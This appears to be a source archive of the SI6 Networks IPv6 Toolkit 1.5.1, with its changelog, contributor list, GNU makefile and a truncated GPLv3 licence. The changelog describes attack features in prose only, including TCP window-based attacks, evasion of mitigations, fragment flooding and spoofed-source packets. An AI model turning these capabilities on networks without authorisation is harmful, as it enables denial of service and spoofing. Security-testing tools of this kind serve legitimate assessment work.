pax_global_header00006660000000000000000000000064122370274720014520gustar00rootroot0000000000000052 comment=927df720fc7ab0022d71044d279494df554c1a77 ipv6toolkit-1.5.1/000077500000000000000000000000001223702747200140165ustar00rootroot00000000000000ipv6toolkit-1.5.1/.gitignore000066400000000000000000000010271223702747200160060ustar00rootroot00000000000000# Temporary files # ################### *.h~ *.c~ *.txt~ *.TXT~ Makefile~ *.5~ *.1~ # Compiled source # ################### *.com *.class *.dll *.exe *.o *.so # Packages # ############ # it's better to unpack these files and commit the raw source # git has its own built in compression methods *.7z *.dmg *.gz *.iso *.jar *.rar *.tar *.zip # Logs and databases # ###################### *.log *.sql *.sqlite # OS generated files # ###################### .DS_Store .DS_Store? ._* .Spotlight-V100 .Trashes Icon? ehthumbs.db Thumbs.db ipv6toolkit-1.5.1/CHANGES.TXT000066400000000000000000000114351223702747200154730ustar00rootroot00000000000000SI6 Networks IPv6 Toolkit v1.5.1 * Fix Mac OS breakage libipv6.h had incorrect definitions for "struct tcp_hdr". SI6 Networks IPv6 Toolkit v1.5 * All: Improved the next-hop determination Since the toolkit employs lipcap (as there is no portable way to forge IPv6 addresses and do other tricks), it was relying on the user specifying a network interface ("-i" was mandatory for all tools) and that routers would send Router Advertisements on the local links. This not only was rather inconventient for users (specifying a network interace was not warranted), but also meant that in setups where RAs where not available (e.g., manual configuration), the tools would fail. The toolkit now eploys routing sockets (in BSDs) or Netlink (in Linux), and only uses "sending RAs" as a fall-back in case of failure (IPv6 not configured on the local host). * All: Improved source address selection This is closely related to the previous bullet. * All: More code moved to libipv6 More and more code was moved to libipv6 and removed to the individual tool source files. As wiht some of the above, this was painful and time-consuming, but was necessary -- and in the long run it will make code maintenance easier. * All: libipv6 used throughout all tools This was rather painful and non-exciting, but necessary. SI6 Networks' IPv6 Toolkit v1.4.1 * frag6: Fixed bug that prevented Ethernet header from being filled A bug in the code caused Ethernet frames to go on te wire without any of their header fields completed. * All: Use of library to avoid code replication An "libipv6" library was created, such that common functions do not need to be replicated for each tool. ni6, ns6, rs6, and tcp6 now employ such library. SI6 Networks' IPv6 Toolkit v1.4 release * frag6: Fixed the flooding option Fixed the fragment size used when employing the flooding option. It was prevously sending fragment sizes that where not a multiple of eight, and hence these fragments were dropped. * scan6: Added support for 64-bit encoding of IPv4 addresses Option "--tgt-ipv4" was augmented to support both encodings (32 bit and 64 bit) of embedded IPv4 addresses. * tcp6: Fixed response to Neighbor Solicitations tcp6 was not responding to incomming Neighbor Solicitations. Hence, when packets were sent from spoofed addresses, tcp6 would never receive the response packets, because the NSs sent by the local router or target node would never be responded. * tcp6: Added support for TCP Window-based attacks tcp6 can now close the window after sending an app-layer command, and also "modulate" the TCP window to circumvent trivial mitigations for these attacks ("--window-mode" and "--win-modulate" options). * tcp6: Support for multiple connection-establishment types tcp6 can now cause e.g. TCP simultaneous opens (see the "--open-mode" option). * tcp6: Support for multiple connection-termination types tcp6 can now perform multiple connection-termination types (see the "--close-mode" option). * tcp6: Support for sending application layer requests tcp6 can now send application-layer requests with the "--data" option. * Many improvements to the manual pages. Fixed the troff encoding of many manual pages. Added ipv6toolkit(7), that describes a general description of the toolkit. * All: Fixed bug in link-layer destination address selection Tools now try to find a local router or perform Neighbor Discovery only when necessary (i.e., underlying link-layer is *not* loopback or tunnel, destination address is *not* link-local, and a link-layer destination address has *not* been specified). * All: Fixed bug in option handling Incorrect data type was used for the return value of getopt_long(), thus leading to problems in some architectures. * All: Fixed a number of issues with pcap_next_ex() The timeout parameter of pcap_next_ex() is now based on the platform (the previous constant value had different semantics in different platforms). Additionally, handle the case where pcap_next_ex() returns no packets. * All: General improvements and clean-up The development process now includes building the toolkit with the clang compiler (in addition to gcc), which has lead to the identification of a number of issues. * All: Improved support for building the toolkit. The toolkit now contains one makefile for pmake, and another for GNU make. Added support for the DESTDIR variable. Appropriate paths are selected based on the value of a number of variables. Configuration file is dynamically generated, with the right path to the oui.txt file. ipv6toolkit-1.5.1/CONTRIB.TXT000066400000000000000000000025551223702747200155260ustar00rootroot00000000000000CONTRIBUTORS ------------ ** Contributors ** The following people sent patches that were incorporated into this release of the toolkit: Octavio Alvarez Alexander Bluhm Alistair Crooks Declan A Rieb ** Package maintainers ** Availability of packages for different operating systems makes it easier for users to install and update the toolkit, and for the toolkit to integrate better with the operating systems. These are the maintainers for each of the different packages: + Debian Octavio Alvarez , sponsored by Luciano Bello + FreeBSD Hiroki Sato + Gentoo Linux Robin H. Johnson + NetBSD (pkgsrc framework) Alistair Crooks + OpenBSD Alexander Bluhm ** Troubleshooting/Debugging ** Spotting bugs in networking tool can be tricky, since at times they only show up in specific network scenarios. The following indviduals provided great help in identifying bugs in the the toolkit (thus leading to fixes and improvements): Stephane Bortzmeyer Marc Heuse Erik Muller Declan A Rieb Tim ipv6toolkit-1.5.1/GNUmakefile000066400000000000000000000124301223702747200160700ustar00rootroot00000000000000# # SI6 Networks' IPv6 toolkit Makefile (for GNU make) # # Notes to package developers: # # By default, binaries will be installed in /usr/local/bin, manual pages in # /usr/local/man, data files in /usr/local/share/ipv6toolkit, and configuration # files in /etc # # The path of the binaries and data files can be overriden by setting "PREFIX" # variable accordingly. The path of the manual pages can be overriden by setting # the MANPREFIX variable. Typically, packages will set these variables as follows: # # PREFIX=usr/ # MANPREFIX=usr/share # # Finally, please note that this makefile supports the DESTDIR variable, as # typically employed by package developers. CC= gcc CFLAGS+= -Wall LDFLAGS+= -lpcap -lm ifndef PREFIX PREFIX=/usr/local ifndef MANPREFIX MANPREFIX=/usr/local endif else ifndef MANPREFIX MANPREFIX=/usr/share endif endif ETCPATH= $(DESTDIR)/etc MANPATH= $(DESTDIR)$(MANPREFIX)/man DATAPATH= $(DESTDIR)$(PREFIX)/share/ipv6toolkit BINPATH= $(DESTDIR)$(PREFIX)/bin SBINPATH= $(DESTDIR)$(PREFIX)/sbin SRCPATH= tools SBINTOOLS= flow6 frag6 icmp6 jumbo6 na6 ni6 ns6 ra6 rd6 rs6 scan6 tcp6 BINTOOLS= addr6 TOOLS= $(BINTOOLS) $(SBINTOOLS) LIBS= libipv6.o all: $(TOOLS) $(LIBS) ipv6toolkit.conf addr6: $(SRCPATH)/addr6.c $(SRCPATH)/addr6.h $(SRCPATH)/ipv6toolkit.h $(CC) $(CPPFLAGS) $(CFLAGS) -o addr6 $(SRCPATH)/addr6.c $(LDFLAGS) flow6: $(SRCPATH)/flow6.c $(SRCPATH)/flow6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o flow6 $(SRCPATH)/flow6.c $(LIBS) $(LDFLAGS) frag6: $(SRCPATH)/frag6.c $(SRCPATH)/frag6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o frag6 $(SRCPATH)/frag6.c $(LIBS) $(LDFLAGS) icmp6: $(SRCPATH)/icmp6.c $(SRCPATH)/icmp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o icmp6 $(SRCPATH)/icmp6.c $(LIBS) $(LDFLAGS) jumbo6: $(SRCPATH)/jumbo6.c $(SRCPATH)/jumbo6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o jumbo6 $(SRCPATH)/jumbo6.c $(LIBS) $(LDFLAGS) na6: $(SRCPATH)/na6.c $(SRCPATH)/na6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o na6 $(SRCPATH)/na6.c $(LIBS) $(LDFLAGS) ni6: $(SRCPATH)/ni6.c $(SRCPATH)/ni6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ni6 $(SRCPATH)/ni6.c $(LIBS) $(LDFLAGS) ns6: $(SRCPATH)/ns6.c $(SRCPATH)/ns6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ns6 $(SRCPATH)/ns6.c $(LIBS) $(LDFLAGS) ra6: $(SRCPATH)/ra6.c $(SRCPATH)/ra6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o ra6 $(SRCPATH)/ra6.c $(LIBS) $(LDFLAGS) rd6: $(SRCPATH)/rd6.c $(SRCPATH)/rd6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rd6 $(SRCPATH)/rd6.c $(LIBS) $(LDFLAGS) rs6: $(SRCPATH)/rs6.c $(SRCPATH)/rs6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o rs6 $(SRCPATH)/rs6.c $(LIBS) $(LDFLAGS) scan6: $(SRCPATH)/scan6.c $(SRCPATH)/scan6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o scan6 $(SRCPATH)/scan6.c $(LIBS) $(LDFLAGS) tcp6: $(SRCPATH)/tcp6.c $(SRCPATH)/tcp6.h $(SRCPATH)/ipv6toolkit.h $(LIBS) $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -o tcp6 $(SRCPATH)/tcp6.c $(LIBS) $(LDFLAGS) libipv6.o: $(SRCPATH)/libipv6.c $(SRCPATH)/libipv6.h $(CC) $(CPPFLAGS) $(CFLAGS) -c -o libipv6.o $(SRCPATH)/libipv6.c ipv6toolkit.conf: echo "# SI6 Networks' IPv6 Toolkit Configuration File" > \ data/ipv6toolkit.conf echo OUI-Database=$(PREFIX)/share/ipv6toolkit/oui.txt >> \ data/ipv6toolkit.conf clean: rm -f $(TOOLS) $(LIBS) rm -f data/ipv6toolkit.conf install: all # Install the binaries install -m0755 -d $(BINPATH) install -m0755 -d $(SBINPATH) install -m0755 $(BINTOOLS) $(BINPATH) install -m0755 $(SBINTOOLS) $(SBINPATH) # Install the configuration file install -m0644 data/ipv6toolkit.conf $(ETCPATH) # Install the IEEE OUI database install -m0755 -d $(DATAPATH) install -m0644 data/oui.txt $(DATAPATH) # Install the manual pages install -m0755 -d $(MANPATH)/man1 install -m0644 manuals/*.1 $(MANPATH)/man1 install -m0755 -d $(MANPATH)/man5 install -m0644 manuals/*.5 $(MANPATH)/man5 install -m0755 -d $(MANPATH)/man7 install -m0644 manuals/*.7 $(MANPATH)/man7 uninstall: # Remove the binaries rm -f $(BINPATH)/addr6 rm -f $(SBINPATH)/flow6 rm -f $(SBINPATH)/frag6 rm -f $(SBINPATH)/icmp6 rm -f $(SBINPATH)/jumbo6 rm -f $(SBINPATH)/na6 rm -f $(SBINPATH)/ni6 rm -f $(SBINPATH)/ns6 rm -f $(SBINPATH)/ra6 rm -f $(SBINPATH)/rd6 rm -f $(SBINPATH)/rs6 rm -f $(SBINPATH)/scan6 rm -f $(SBINPATH)/tcp6 # Remove the configuration file rm -f $(ETCPATH)/ipv6toolkit.conf # Remove the IEEE OUI database rm -rf $(DATAPATH) # Remove the manual pages rm -f $(MANPATH)/man1/addr6.1 rm -f $(MANPATH)/man1/flow6.1 rm -f $(MANPATH)/man1/frag6.1 rm -f $(MANPATH)/man1/icmp6.1 rm -f $(MANPATH)/man1/jumbo6.1 rm -f $(MANPATH)/man1/na6.1 rm -f $(MANPATH)/man1/ni6.1 rm -f $(MANPATH)/man1/ns6.1 rm -f $(MANPATH)/man1/ra6.1 rm -f $(MANPATH)/man1/rd6.1 rm -f $(MANPATH)/man1/rs6.1 rm -f $(MANPATH)/man1/scan6.1 rm -f $(MANPATH)/man1/tcp6.1 rm -f $(MANPATH)/man5/ipv6toolkit.conf.5 rm -f $(MANPATH)/man7/ipv6toolkit.7 ipv6toolkit-1.5.1/LICENSE.TXT000066400000000000000000001045131223702747200155050ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 3, 29 June 2007 Copyright (C) 2007 Free Software Foundation, Inc. Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The GNU General Public License is a free, copyleft license for software and other kinds of works. The licenses for most software and other practical works are designed to take away your freedom to share and change the works. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change all versions of a program--to make sure it remains free software for all its users. We, the Free Software Foundation, use the GNU General Public License for most of our software; it applies also to any other work released this way by its authors. You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for them if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs, and that you know you can do these things. To protect your rights, we need to prevent others from denying you these rights or asking you to surrender the rights. Therefore, you have certain responsibilities if you distribute copies of the software, or if you modify it: responsibilities to respect the freedom of others. For example, if you distribute copies of such a program, whether gratis or for a fee, you must pass on to the recipients the same freedoms that you received. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. Developers that use the GNU GPL protect your rights with two steps: (1) assert copyright on the software, and (2) offer you this License giving you legal permission to copy, distribute and/or modify it. For the developers' and authors' protection, the GPL clearly explains that there is no warranty for this free software. For both users' and authors' sake, the GPL requires that modified versions be marked as changed, so that their problems will not be attributed erroneously to authors of previous versions. Some devices are designed to deny users access to install or run modified versions of the software inside them, although the manufacturer can do so. This is fundamentally incompatible with the aim of protecting users' freedom to change the software. The systematic pattern of such abuse occurs in the area of products for individuals to use, which is precisely where it is most unacceptable. Therefore, we have designed this version of the GPL to prohibit the practice for those products. If such problems arise substantially in other domains, we stand ready to extend this provision to those domains in future versions of the GPL, as needed to protect the freedom of users. Finally, every program is threatened constantly by software patents. States should not allow patents to restrict development and use of software on general-purpose computers, but in those that do, we wish to avoid the special danger that patents applied to a free program could make it effectively proprietary. To prevent this, the GPL assures that patents cannot be used to render the program non-free. The precise terms and conditions for copying, distribution and modification follow. TERMS AND CONDITIONS 0. Definitions. "This License" refers to version 3 of the GNU General Public License. "Copyright" also means copyright-like laws that apply to other kinds of works, such as semiconductor masks. "The Program" refers to any copyrightable work licensed under this License. Each licensee is addressed as "you". "Licensees" and "recipients" may be individuals or organizations. To "modify" a work means to copy from or adapt all or part of the work in a fashion requiring copyright permission, other than the making of an exact copy. The resulting work is called a "modified version" of the earlier work or a work "based on" the earlier work. A "covered work" means either the unmodified Program or a work based on the Program. To "propagate" a work means to do anything with it that, without permission, would make you directly or secondarily liable for infringement under applicable copyright law, except executing it on a computer or modifying a private copy. Propagation includes copying, distribution (with or without modification), making available to the public, and in some countries other activities as well. To "convey" a work means any kind of propagation that enables other parties to make or receive copies. Mere interaction with a user through a computer network, with no transfer of a copy, is not conveying. An interactive user interface displays "Appropriate Legal Notices" to the extent that it includes a convenient and prominently visible feature that (1) displays an appropriate copyright notice, and (2) tells the user that there is no warranty for the work (except to the extent that warranties are provided), that licensees may convey the work under this License, and how to view a copy of this License. If the interface presents a list of user commands or options, such as a menu, a prominent item in the list meets this criterion. 1. Source Code. The "source code" for a work means the preferred form of the work for making modifications to it. "Object code" means any non-source form of a work. A "Standard Interface" means an interface that either is an official standard defined by a recognized standards body, or, in the case of interfaces specified for a particular programming language, one that is widely used among developers working in that language. The "System Libraries" of an executable work include anything, other than the work as a whole, that (a) is included in the normal form of packaging a Major Component, but which is not part of that Major Component, and (b) serves only to enable use of the work with that Major Component, or to implement a Standard Interface for which an implementation is available to the public in source code form. A "Major Component", in this context, means a major essential component (kernel, window system, and so on) of the specific operating system (if any) on which the executable work runs, or a compiler used to produce the work, or an object code interpreter used to run it. The "Corresponding Source" for a work in object code form means all the source code needed to generate, install, and (for an executable work) run the object code and to modify the work, including scripts to control those activities. However, it does not include the work's System Libraries, or general-purpose tools or generally available free programs which are used unmodified in performing those activities but which are not part of the work. For example, Corresponding Source includes interface definition files associated with source files for the work, and the source code for shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work. The Corresponding Source need not include anything that users can regenerate automatically from other parts of the Corresponding Source. The Corresponding Source for a work in source code form is that same work. 2. Basic Permissions. All rights granted under this License are granted for the term of copyright on the Program, and are irrevocable provided the stated conditions are met. This License explicitly affirms your unlimited permission to run the unmodified Program. The output from running a covered work is covered by this License only if the output, given its content, constitutes a covered work. This License acknowledges your rights of fair use or other equivalent, as provided by copyright law. You may make, run and propagate covered works that you do not convey, without conditions so long as your license otherwise remains in force. You may convey covered works to others for the sole purpose of having them make modifications exclusively for you, or provide you with facilities for running those works, provided that you comply with the terms of this License in conveying all material for which you do not control copyright. Those thus making or running the covered works for you must do so exclusively on your behalf, under your direction and control, on terms that prohibit them from making any copies of your copyrighted material outside their relationship with you. Conveying under any other circumstances is permitted solely under the conditions stated below. Sublicensing is not allowed; section 10 makes it unnecessary. 3. Protecting Users' Legal Rights From Anti-Circumvention Law. No covered work shall be deemed part of an effective technological measure under any applicable law fulfilling obligations under article 11 of the WIPO copyright treaty adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention of such measures. When you convey a covered work, you waive any legal power to forbid circumvention of technological measures to the extent such circumvention is effected by exercising rights under this License with respect to the covered work, and you disclaim any intention to limit operation or modification of the work as a means of enforcing, against the work's users, your or third parties' legal rights to forbid circumvention of technological measures. 4. Conveying Verbatim Copies. You may convey verbatim copies of the Program's source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice; keep intact all notices stating that this License and any non-permissive terms added in accord with section 7 apply to the code; keep intact all notices of the absence of any warranty; and give all recipients a copy of this License along with the Program. You may charge any price or no price for each copy that you convey, and you may offer support or warranty protection for a fee. 5. Conveying Modified Source Versions. You may convey a work based on the Program, or the modifications to produce it from the Program, in the form of source code under the terms of section 4, provided that you also meet all of these conditions: a) The work must carry prominent notices stating that you modified it, and giving a relevant date. b) The work must carry prominent notices stating that it is released under this License and any conditions added under section 7. This requirement modifies the requirement in section 4 to "keep intact all notices". c) You must license the entire work, as a whole, under this License to anyone who comes into possession of a copy. This License will therefore apply, along with any applicable section 7 additional terms, to the whole of the work, and all its parts, regardless of how they are packaged. This License gives no permission to license the work in any other way, but it does not invalidate such permission if you have separately received it. d) If the work has interactive user interfaces, each must display Appropriate Legal Notices; however, if the Program has interactive interfaces that do not display Appropriate Legal Notices, your work need not make them do so. A compilation of a covered work with other separate and independent works, which are not by their nature extensions of the covered work, and which are not combined with it such as to form a larger program, in or on a volume of a storage or distribution medium, is called an "aggregate" if the compilation and its resulting copyright are not used to limit the access or legal rights of the compilation's users beyond what the individual works permit. Inclusion of a covered work in an aggregate does not cause this License to apply to the other parts of the aggregate. 6. Conveying Non-Source Forms. You may convey a covered work in object code form under the terms of sections 4 and 5, provided that you also convey the machine-readable Corresponding Source under the terms of this License, in one of these ways: a) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by the Corresponding Source fixed on a durable physical medium customarily used for software interchange. b) Convey the object code in, or embodied in, a physical product (including a physical distribution medium), accompanied by a written offer, valid for at least three years and valid for as long as you offer spare parts or customer support for that product model, to give anyone who possesses the object code either (1) a copy of the Corresponding Source for all the software in the product that is covered by this License, on a durable physical medium customarily used for software interchange, for a price no more than your reasonable cost of physically performing this conveying of source, or (2) access to copy the Corresponding Source from a network server at no charge. c) Convey individual copies of the object code with a copy of the written offer to provide the Corresponding Source. This alternative is allowed only occasionally and noncommercially, and only if you received the object code with such an offer, in accord with subsection 6b. d) Convey the object code by offering access from a designated place (gratis or for a charge), and offer equivalent access to the Corresponding Source in the same way through the same place at no further charge. You need not require recipients to copy the Corresponding Source along with the object code. If the place to copy the object code is a network server, the Corresponding Source may be on a different server (operated by you or a third party) that supports equivalent copying facilities, provided you maintain clear directions next to the object code saying where to find the Corresponding Source. Regardless of what server hosts the Corresponding Source, you remain obligated to ensure that it is available for as long as needed to satisfy these requirements. e) Convey the object code using peer-to-peer transmission, provided you inform other peers where the object code and Corresponding Source of the work are being offered to the general public at no charge under subsection 6d. A separable portion of the object code, whose source code is excluded from the Corresponding Source as a System Library, need not be included in conveying the object code work. A "User Product" is either (1) a "consumer product", which means any tangible personal property which is normally used for personal, family, or household purposes, or (2) anything designed or sold for incorporation into a dwelling. In determining whether a product is a consumer product, doubtful cases shall be resolved in favor of coverage. For a particular product received by a particular user, "normally used" refers to a typical or common use of that class of product, regardless of the status of the particular user or of the way in which the particular user actually uses, or expects or is expected to use, the product. A product is a consumer product regardless of whether the product has substantial commercial, industrial or non-consumer uses, unless such uses represent the only significant mode of use of the product. "Installation Information" for a User Product means any methods, procedures, authorization keys, or other information required to install and execute modified versions of a covered work in that User Product from a modified version of its Corresponding Source. The information must suffice to ensure that the continued functioning of the modified object code is in no case prevented or interfered with solely because modification has been made. If you convey an object code work under this section in, or with, or specifically for use in, a User Product, and the conveying occurs as part of a transaction in which the right of possession and use of the User Product is transferred to the recipient in perpetuity or for a fixed term (regardless of how the transaction is characterized), the Corresponding Source conveyed under this section must be accompanied by the Installation Information. But this requirement does not apply if neither you nor any third party retains the ability to install modified object code on the User Product (for example, the work has been installed in ROM). The requirement to provide Installation Information does not include a requirement to continue to provide support service, warranty, or updates for a work that has been modified or installed by the recipient, or for the User Product in which it has been modified or installed. Access to a network may be denied when the modification itself materially and adversely affects the operation of the network or violates the rules and protocols for communication across the network. Corresponding Source conveyed, and Installation Information provided, in accord with this section must be in a format that is publicly documented (and with an implementation available to the public in source code form), and must require no special password or key for unpacking, reading or copying. 7. Additional Terms. "Additional permissions" are terms that supplement the terms of this License by making exceptions from one or more of its conditions. Additional permissions that are applicable to the entire Program shall be treated as though they were included in this License, to the extent that they are valid under applicable law. If additional permissions apply only to part of the Program, that part may be used separately under those permissions, but the entire Program remains governed by this License without regard to the additional permissions. When you convey a copy of a covered work, you may at your option remove any additional permissions from that copy, or from any part of it. (Additional permissions may be written to require their own removal in certain cases when you modify the work.) You may place additional permissions on material, added by you to a covered work, for which you have or can give appropriate copyright permission. Notwithstanding any other provision of this License, for material you add to a covered work, you may (if authorized by the copyright holders of that material) supplement the terms of this License with terms: a) Disclaiming warranty or limiting liability differently from the terms of sections 15 and 16 of this License; or b) Requiring preservation of specified reasonable legal notices or author attributions in that material or in the Appropriate Legal Notices displayed by works containing it; or c) Prohibiting misrepresentation of the origin of that material, or requiring that modified versions of such material be marked in reasonable ways as different from the original version; or d) Limiting the use for publicity purposes of names of licensors or authors of the material; or e) Declining to grant rights under trademark law for use of some trade names, trademarks, or service marks; or f) Requiring indemnification of licensors and authors of that material by anyone who conveys the material (or modified versions of it) with contractual assumptions of liability to the recipient, for any liability that these contractual assumptions directly impose on those licensors and authors. All other non-permissive additional terms are considered "further restrictions" within the meaning of section 10. If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term. If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying. If you add terms to a covered work in accord with this section, you must place, in the relevant source files, a statement of the additional terms that apply to those files, or a notice indicating where to find the applicable terms. Additional terms, permissive or non-permissive, may be stated in the form of a separately written license, or stated as exceptions; the above requirements apply either way. 8. Termination. You may not propagate or modify a covered work except as expressly provided under this License. Any attempt otherwise to propagate or modify it is void, and will automatically terminate your rights under this License (including any patent licenses granted under the third paragraph of section 11). However, if you cease all violation of this License, then your license from a particular copyright holder is reinstated (a) provisionally, unless and until the copyright holder explicitly and finally terminates your license, and (b) permanently, if the copyright holder fails to notify you of the violation by some reasonable means prior to 60 days after the cessation. Moreover, your license from a particular copyright holder is reinstated permanently if the copyright holder notifies you of the violation by some reasonable means, this is the first time you have received notice of violation of this License (for any work) from that copyright holder, and you cure the violation prior to 30 days after your receipt of the notice. Termination of your rights under this section does not terminate the licenses of parties who have received copies or rights from you under this License. If your rights have been terminated and not permanently reinstated, you do not qualify to receive new licenses for the same material under section 10. 9. Acceptance Not Required for Having Copies. You are not required to accept this License in order to receive or run a copy of the Program. Ancillary propagation of a covered work occurring solely as a consequence of using peer-to-peer transmission to receive a copy likewise does not require acceptance. However, nothing other than this License grants you permission to propagate or modify any covered work. These actions infringe copyright if you do not accept this License. Therefore, by modifying or propagating a covered work, you indicate your acceptance of this License to do so. 10. Automatic Licensing of Downstream Recipients. Each time you convey a covered work, the recipient automatically receives a license from the original licensors, to run, modify and propagate that work, subject to this License. You are not responsible for enforcing compliance by third parties with this License. An "entity transaction" is a transaction transferring control of an organization, or substantially all assets of one, or subdividing an organization, or merging organizations. If propagation of a covered work results from an entity transaction, each party to that transaction who receives a copy of the work also receives whatever licenses to the work the party's predecessor in interest had or could give under the previous paragraph, plus a right to possession of the Corresponding Source of the work from the predecessor in interest, if the predecessor has it or can get it with reasonable efforts. You may not impose any further restrictions on the exercise of the rights granted or affirmed under this License. For example, you may not impose a license fee, royalty, or other charge for exercise of rights granted under this License, and you may not initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging that any patent claim is infringed by making, using, selling, offering for sale, or importing the Program or any portion of it. 11. Patents. A "contributor" is a copyright holder who authorizes use under this License of the Program or a work on which the Program is based. The work thus licensed is called the contributor's "contributor version". A contributor's "essential patent claims" are all patent claims owned or controlled by the contributor, whether already acquired or hereafter acquired, that would be infringed by some manner, permitted by this License, of making, using, or selling its contributor version, but do not include claims that would be infringed only as a consequence of further modification of the contributor version. For purposes of this definition, "control" includes the right to grant patent sublicenses in a manner consistent with the requirements of this License. Each contributor grants you a non-exclusive, worldwide, royalty-free patent license under the contributor's essential patent claims, to make, use, sell, offer for sale, import and otherwise run, modify and propagate the contents of its contributor version. In the following three paragraphs, a "patent license" is any express agreement or commitment, however denominated, not to enforce a patent (such as an express permission to practice a patent or covenant not to sue for patent infringement). To "grant" such a patent license to a party means to make such an agreement or commitment not to enforce a patent against the party. If you convey a covered work, knowingly relying on a patent license, and the Corresponding Source of the work is not available for anyone to copy, free of charge and under the terms of this License, through a publicly available network server or other readily accessible means, then you must either (1) cause the Corresponding Source to be so available, or (2) arrange to deprive yourself of the benefit of the patent license for this particular work, or (3) arrange, in a manner consistent with the requirements of this License, to extend the patent license to downstream recipients. "Knowingly relying" means you have actual knowledge that, but for the patent license, your conveying the covered work in a country, or your recipient's use of the covered work in a country, would infringe one or more identifiable patents in that country that you have reason to believe are valid. If, pursuant to or in connection with a single transaction or arrangement, you convey, or propagate by procuring conveyance of, a covered work, and grant a patent license to some of the parties receiving the covered work authorizing them to use, propagate, modify or convey a specific copy of the covered work, then the patent license you grant is automatically extended to all recipients of the covered work and works based on it. A patent license is "discriminatory" if it does not include within the scope of its coverage, prohibits the exercise of, or is conditioned on the non-exercise of one or more of the rights that are specifically granted under this License. You may not convey a covered work if you are a party to an arrangement with a third party that is in the business of distributing software, under which you make payment to the third party based on the extent of your activity of conveying the work, and under which the third party grants, to any of the parties who would receive the covered work from you, a discriminatory patent license (a) in connection with copies of the covered work conveyed by you (or copies made from those copies), or (b) primarily for and in connection with specific products or compilations that contain the covered work, unless you entered into that arrangement, or that patent license was granted, prior to 28 March 2007. Nothing in this License shall be construed as excluding or limiting any implied license or other defenses to infringement that may otherwise be available to you under applicable patent law. 12. No Surrender of Others' Freedom. If conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot convey a covered work so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not convey it at all. For example, if you agree to terms that obligate you to collect a royalty for further conveying from those to whom you convey the Program, the only way you could satisfy both those terms and this License would be to refrain entirely from conveying the Program. 13. Use with the GNU Affero General Public License. Notwithstanding any other provision of this License, you have permission to link or combine any covered work with a work licensed under version 3 of the GNU Affero General Public License into a single combined work, and to convey the resulting work. The terms of this License will continue to apply to the part which is the covered work, but the special requirements of the GNU Affero General Public License, section 13, concerning interaction through a network will apply to the combination as such. 14. Revised Versions of this License. The Free Software Foundation may publish revised and/or new versions of the GNU General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Program specifies that a certain numbered version of the GNU General Public License "or any later version" applies to it, you have the option of following the terms and conditions either of that numbered version or of any later version published by the Free Software Foundation. If the Program does not specify a version number of the GNU General Public License, you may choose any version ever published by the Free Software Foundation. If the Program specifies that a proxy can decide which future versions of the GNU General Public License can be used, that proxy's public statement of acceptance of a version permanently authorizes you to choose that version for the Program. Later license versions may give you additional or different permissions. However, no additional obligations are imposed on any author or copyright holder as a result of your choosing to follow a later version. 15. Disclaimer of Warranty. THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. Limitation of Liability. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES 